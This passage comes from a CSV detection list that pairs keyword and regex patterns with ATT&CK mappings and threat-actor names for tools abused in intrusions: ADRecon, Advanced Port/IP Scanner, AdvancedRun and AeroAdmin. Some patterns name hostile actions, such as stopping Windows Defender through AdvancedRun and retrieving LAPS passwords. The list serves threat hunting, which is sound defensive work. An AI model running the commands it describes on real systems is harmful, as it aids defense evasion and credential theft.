TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*309a6b123ebdbb92766addeb8326311b86c26a21eb5cad30c8cde6c237019046*",".{0,1000}309a6b123ebdbb92766addeb8326311b86c26a21eb5cad30c8cde6c237019046.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","#filehash","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*ADRecon * by Prashant Mahajan (@prashant3535)*",".{0,1000}ADRecon\s.{0,1000}\sby\sPrashant\sMahajan\s\(\@prashant3535\).{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*ADRecon -OutputDir *",".{0,1000}ADRecon\s\-OutputDir\s.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" 
"*ADRecon.ps1*",".{0,1000}ADRecon\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*adrecon/ADRecon*",".{0,1000}adrecon\/ADRecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*ADRecon-Console-Log.txt*",".{0,1000}ADRecon\-Console\-Log\.txt.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*ADRecon-master.zip*",".{0,1000}ADRecon\-master\.zip.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered 
Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*ADRecon-Report-*",".{0,1000}ADRecon\-Report\-.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*-ADRecon-Report.xlsx*",".{0,1000}\-ADRecon\-Report\.xlsx.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*Get-LAPSPasswords.ps1*",".{0,1000}Get\-LAPSPasswords\.ps1.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*Invoke-ADRecon*",".{0,1000}Invoke\-ADRecon.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of 
the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","1","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*Invoke-UserImpersonation -Credential *",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","Scattered Spider*","Discovery","https://github.com/adrecon/ADRecon","1","0","N/A","AD Enumeration","7","7","664","98","2024-07-03T10:27:43Z","2018-12-15T13:00:09Z" "*/Advanced_Port_Scanner_*.exe*",".{0,1000}\/Advanced_Port_Scanner_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/lansearch.exe*",".{0,1000}\/lansearch\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Advanced Port Scanner Portable\*",".{0,1000}\\Advanced\sPort\sScanner\sPortable\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered 
Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\lansearch.exe*",".{0,1000}\\lansearch\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Temp\2\Advanced Port Scanner 2\*",".{0,1000}\\Temp\\2\\Advanced\sPort\sScanner\s2\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*>Advanced Port Scanner Setup<*",".{0,1000}\>Advanced\sPort\sScanner\sSetup\<.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A" "*>Advanced Port Scanner<*",".{0,1000}\>Advanced\sPort\sScanner\<.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A" "*advanced_port_scanner.exe*",".{0,1000}advanced_port_scanner\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 
- TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*advanced_port_scanner_console.exe*",".{0,1000}advanced_port_scanner_console\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb*",".{0,1000}d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*http://www.advanced-port-scanner.com/checkupdate.php*",".{0,1000}http\:\/\/www\.advanced\-port\-scanner\.com\/checkupdate\.php.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*lansearch.exe *",".{0,1000}lansearch\.exe\s.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" 
"*lansearchpro_portable.zip*",".{0,1000}lansearchpro_portable\.zip.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*lansearchpro_setup.exe*",".{0,1000}lansearchpro_setup\.exe.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\Advanced Port Scanner\*",".{0,1000}Program\sFiles\s\(x86\)\\Advanced\sPort\sScanner\\.{0,1000}","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","LockBit - BianLian - PYSA - Trigona - EvilCorp* - Fog - Scattered Spider*","Discovery","https://www.advanced-port-scanner.com/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*.exe /s:ip_ranges.txt /f:scan_results.txt*",".{0,1000}\.exe\s\/s\:ip_ranges\.txt\s\/f\:scan_results\.txt.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Advanced IP Scanner.lnk*",".{0,1000}\\Advanced\sIP\sScanner\.lnk.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\advanced_ip_scanner*",".{0,1000}advanced_ip_scanner.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Local\Temp\Advanced IP Scanner 2\*",".{0,1000}\\Local\\Temp\\Advanced\sIP\sScanner\s2\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Advanced IP Scanner\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Advanced\sIP\sScanner\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Programs\Advanced IP Scanner Portable\*",".{0,1000}\\Programs\\Advanced\sIP\sScanner\sPortable\\.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\Advanced IP Scanner v2*",".{0,1000}\\Start\sMenu\\Programs\\Advanced\sIP\sScanner\sv2.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*>Advanced IP Scanner Setup<*",".{0,1000}\>Advanced\sIP\sScanner\sSetup\<.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#description","N/A","7","10","N/A","N/A","N/A","N/A" "*>Advanced IP Scanner<*",".{0,1000}\>Advanced\sIP\sScanner\<.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#productname","N/A","7","10","N/A","N/A","N/A","N/A" "*26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b*",".{0,1000}26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b*",".{0,1000}26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193b.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A" "*Advanced IP Scanner*",".{0,1000}Advanced\sIP\sScanner.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*Advanced_IP_Scanner*.exe*",".{0,1000}Advanced_IP_Scanner.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*advanced_ip_scanner_console.exe*",".{0,1000}advanced_ip_scanner_console\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*https://download.advanced-ip-scanner.com/download/files/*.exe*",".{0,1000}https\:\/\/download\.advanced\-ip\-scanner\.com\/download\/files\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA)","T1135 - T1021 - T1016 - T1046","TA0007 - TA0043","N/A","MAZE - BlackSuit - Roya - Akira - LockBit - Diavol - GoGoogle - INC Ransom - Hive - ZolaConti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Discovery","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*AdvancedRun.exe /EXEFilename *\sc.exe*stop WinDefend*",".{0,1000}AdvancedRun\.exe\s\/EXEFilename\s.{0,1000}\\sc\.exe.{0,1000}stop\sWinDefend.{0,1000}","greyware_tool_keyword","AdvancedRun","nirsoft tool - Run a program with different settings that you choose","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "* aeroadmin.exe*",".{0,1000}\saeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/aeroadmin.exe*",".{0,1000}\/aeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AeroAdmin *_Portable.exe*",".{0,1000}\\AeroAdmin\s.{0,1000}_Portable\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\aeroadmin.exe*",".{0,1000}\\aeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Aeroadmin.lnk*",".{0,1000}\\Aeroadmin\.lnk.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Aeroadmin\black.bmp*",".{0,1000}\\Aeroadmin\\black\.bmp.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Control\SafeBoot\Network\AeroadminService*",".{0,1000}\\CurrentControlSet\\Control\\SafeBoot\\Network\\AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\AeroadminService*",".{0,1000}\\CurrentControlSet\\Services\\AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\InventoryApplicationFile\aeroadmin*",".{0,1000}\\InventoryApplicationFile\\aeroadmin.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - 
